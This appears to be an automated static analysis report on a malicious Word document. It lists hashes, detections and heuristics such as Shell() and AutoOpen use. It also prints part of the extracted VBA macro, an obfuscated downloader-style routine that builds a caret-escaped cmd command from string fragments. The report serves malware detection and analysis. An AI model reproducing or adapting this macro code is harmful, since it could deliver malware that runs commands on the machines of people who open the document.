Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bbdfa6d962aad115…

MALICIOUS

Office (OLE)

Size: 86.5 KB
Created: 2018-08-27 21:45:00
Authoring application: Microsoft Office Word
First seen: 2018-09-04
MD5: 33e63037b35ee989f9ac8cb0f7492ca2
SHA-1: db115013c56aa86326cc5a2f2bf8abb2febab111
SHA-256: bbdfa6d962aad1150dde37e48a8d357c2ca792f938c810e6c21354c4daaa2442
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 (Visual Basic)
  • T1204.002 (Malicious File)

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an intent to execute arbitrary commands. The presence of an AutoOpen macro further suggests automatic execution upon opening the document. No specific family could be identified, but the techniques used are common for macro-based malware.

Heuristics (7)

  • ClamAV: Doc.Malware.Valyria-6797106-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-6797106-0
  • VBA macros detected (medium; OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical; OLE_VBA_SHELL)
    The VBA source contains a Shell() call
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10425 bytes
SHA-256: 5f945b79502c5431a9491f01c84d2d73395ae37651d609a13ec4624703f5ea50

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "QWAVCmbWUGi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "vlIoOfNZCBLsbf"
Function qInVro()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error jVpRhX / nUcdsa
   Error 7287 / 20391
BZMwQiNFZWq = "Md  /" + "v/r " + Chr(0 + 4 + 3 + 1 + 26) + " ^" + "sE^T" + " " + "^ " + "^h^q^x" + "==^" + "=^" + "A" + "^Ag^AA" + "^I^A"
Error tMCaD * 59093 * 14938 * QQGqqL
   Error OijvB / 7346 * sLjQt * pvvMZi
   Error 57039 * zfPzGA / 13644 * zihijA
   Error 79145 * 98804 / 40812 / iVwZw
zDSBClTWPi = "ACA^g" + "^AA^" + "IA" + "AC^A^g" + "^AAIAA" + "C^A^" + "gA^A^I" + "^A^ACAg" + "^AA"
Error cmLup / AaBkP
   Error 32553 / CzdWR * 66906 * 54826
   Error rqFwI / GQpMjw * zAKQzX * kWiHjf
   Error 48041 / 45634
jcjuv = "^I^" + "AACAgA" + "^A" + "I^" + "A^0^H^A"
Error mBImQ * 36203 / 50647 / tnnacw
WdMbk = "9Bw" + "^e^Ag^" + "G^Aj" + "BA^dA" + "E" + "GA^" + "j" + "BQf" + "^A" + "s^D^ArB" + "^QYA^UG" + "^Ay^B"
Error 72536 * jZIUW * 17598 / joiRDz
   Error 89634 * XupwjI
   Error PlnsoR / IwOdH / 64095 * jCiKjp
TXPPwYoWfjd = "^g" + "^" + "Y" + "^As^" + "D^A^O^B" + "^wQ" + "^" + "A^Y^E" + "^A" + "^k^AA" + "I^A0" + "GA^lB^A"
Error biRCr * qYUTEO * 68252 / 60492
   Error tZYiBj / kzvQon / GLzOEf * arzEJp
   Error DXuobS / UnQzwU / zUdFYH * OjZMwB
isrZic = "^d^A^k^" + "E" + "At^A" + "QZ^AsG" + "AvB" + "^g^" + "d^A^4G^" + "AJ^Bw^" + "OA"
Error zmvnQ / ivzQOv
   Error lMIRHO * TwMaHz * 90493 * NVUJuI
   Error izDfT * bZsqtP
   Error 36254 * 95541 * 63073 * 49761
jkobZFaSstb = "^" + "kC^AOBw" + "^" + "QAYEA^k" + "AA^IA" + "wCATB^A" + "a^AY" + "^E^A" + "^k^" + "AAK" + "^A" + "UG^A^s^"
Error 53668 / HTfni
   Error Jajmzm / XBkoj
JILoNPPOiX = "B" + "^Qa" + "AYE^A" + "kBQ^YA" + "8^G^As^" + "BgbA" + "cHA" + "v" + "^B^A" + "R^A^4" + "C^A^y^" + "BQ" + "^Q^A^"
Error sTfBlz / LrXlO / 5108 / WRUacI
   Error 9760 * PHhfK * LvCGN / uftMB
   Error 78593 / Umvulm
jLOzFrd = "o^G^A" + "k" + "AweA^k" + "H^" + "A^y^B^A" + "^dA^s^H" + "Ap^A^gT"
Error 75530 * BbcaG
zPQFOk = "^" + "A8^" + "GA" + "^G" + "B" + "^AJA^" + "AC" + "A^uB" + "Q^a^A" + "^"
qInVro = BZMwQiNFZWq + zDSBClTWPi + jcjuv + WdMbk + TXPPwYoWfjd + isrZic + jkobZFaSstb + JILoNPPOiX + jLOzFrd + zPQFOk
   Error ppCCw / jhOfw * wIOuK * EBrcv
   Error 45135 * OZlZR * 36537 / jUAKX
   Error 68981 * FMqkF * 90688 * sKTYQr
End Function
Function DOTEiQSoc()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error 84827 * KaWQI
   Error 77849 * sijfU
   Error dBUHR / qsSpNM
   Error lIBFi / OpNArh
RPalq = "ACATBAa" + "^AY" + "E^" + "A^k^A^A" + "^KAgG^A" + "^jB^Q" + "YA^UG^" + "AyBwbAY" + "^GA^" + "7^A^wJ"
Error 8756 / Prlib
   Error 3661 / CAMrIn * 1048 / ouPdrF
   Error 78438 * hDaVQ / Lonbd * uVoOfC
   Error 19043 * 20807 / pjsSo / pPspLs
   Error 22109 * vuDbf / WkLSLp / pJKpkb
VEhIdAOZwKA = "A^U^G" + "^A4^B" + "^QZA^4" + "CAn" + "^" + "AwKAYG"
Error nzFFTB / 41292 / vNJNP / oiqJrI
   Error BZWfz * XWKqHz
   Error 72718 * olrHfb
zfQBuwI = "A2^" + "B" + "^A^U^A" + "^QC^A" + "rA" + "wJ^" + "Aw^F" + "An^" + "A^wK^A" + "^M^GA"
Error 14296 * HwVbVB
   Error 17558 / kihic * 514 / GNiXdw
   Error 38835 / LLSNQ / mnLzz * CZHSnl
LdqipfOIGkh = "^p" + "BA^b" + "^A^I^G" + "^A1" + "B^A" + "cAoD^A" + "^2^B" + "g^b^" + "A^U^GA" + "^kAQ"
Error nJhBiS * mwjwhs * 11735 * SJSizc
   Error jQBZUY * 72111 * 21284 / 73874
   Error kfoZoh * UaQFfA
EQDPfBfrzzR = "PA4E^AD" + "^B^gR" + "^AQCA^" + "7Aw" + "^" + "J^"
Error 5830 / JoYaT
   Error oDvSia / Aqplcd / sKussp * 83137
   Error 12486 * nzvNW * DdMuMf * XHVww
MinrYjwzKj = "A^AD" + "A" + "^x^" + "A^wN" + "^AcCA" + "^g^A^Q" + "^" + "P^" + "A^" + "AC" + "AmBg^" + "d" + "AA^F^A"
Error Gvowh / hiXiHl
rWRmntTzist = "^k^Aw" + "O^A^kC^" + "AnAA^QA" + "c" + "CA" + "oA^A" + "d^A" + "kG" + "^"
... (truncated)